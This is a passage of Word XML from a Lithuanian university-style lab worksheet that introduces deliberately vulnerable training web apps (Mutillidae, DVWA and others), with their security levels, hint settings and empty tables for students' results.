        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133E99A" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>phpMyAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F95B242" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tikiwiki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TWiki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE44460" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tikiwiki-old</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C1FEBC4" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>dav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WebDav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C907394" w14:textId="75A1C762" w:rsidR="005C1CEF" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc258656095"/>
    </w:p>
    <w:p w14:paraId="5A6B042B" w14:textId="568BD257" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1142F3" w14:textId="42881905" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A34B9AB" w14:textId="53C3C1B1" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EA84C9" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FB6D6E" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="004B0F8F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438CA6C" w14:textId="31BA5738" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B0CBD8" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FB72E2" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="5C084B17"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4E733473"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34AFEC48"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="2857EB03" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45358F64"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32CAC798" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="66812D0D" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FDF8EEE"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4E7B2D2E" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04AA48C8" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035F455D" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7502DB" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA4B6B1" w14:textId="78F4B29C" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB paslaugų pažeidžiamumas: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D015AC7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2529EEC0" w14:textId="439118A5" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> interneto programa (NOWASP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://sourceforge.net/projects/mutillidae/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) yra iš OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dešimtuką. Turi kitų spragų, kaip pavyzdžiui HTML-5 interneto saugyklos pažeidžiamumą – forma viską saugo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>caching</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) ir įvykdomas “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>click-jacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">” tipo pažeidžiamumas. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> leidžia </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ojui keisti "saugumo lygį" nuo 0 (visiškai nesaugus) iki 5 (saugus). Trijų lygių užuominomis nuo "0 Lygis - bandau sunkiau" (jokių užuominų) į "2 lygis - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Noob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">" (Maksimalios užuominos) teikiama informacija. Jei prašymas yra pažeistų </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ojų injekcijų, paspaudę "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB" mygtuką iš naujo atstatote prašymą į savo pirminę būseną.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8F299" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563FAFEC" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00053DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A4CCBB" wp14:editId="22D8832F">
            <wp:extent cx="5556739" cy="3123982"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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5671" cy="3134625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CD07E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E750DB" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tam, kad įjungti užuominų į paraišką spustelėkite "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Toggle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Hints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>" mygtuką meniu juostoje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215CEA7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00053DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C25EC9" wp14:editId="4AEE5D28">
            <wp:extent cx="5352757" cy="3009304"/>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5690" cy="3016575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1270E" w14:textId="455F1084" w:rsidR="005C1CEF" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B097383" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408EE7CA" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="004B0F8F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3E92FD" w14:textId="2499C1FD" w:rsidR="004B0F8F" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B3C4BA" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64442C13" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="7DD9CBC8"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265BC8F8"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2A39936F"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="33897BE6" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="276BBC48"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6B22DD1C" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="6402A9AD" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C6302CB"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3D6EF03A" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1ADE7BE8" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58094BDC" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B018B3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc258656096"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WEB paslaugų pažeidžiamumas: DVWA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B08CCE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45168564" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
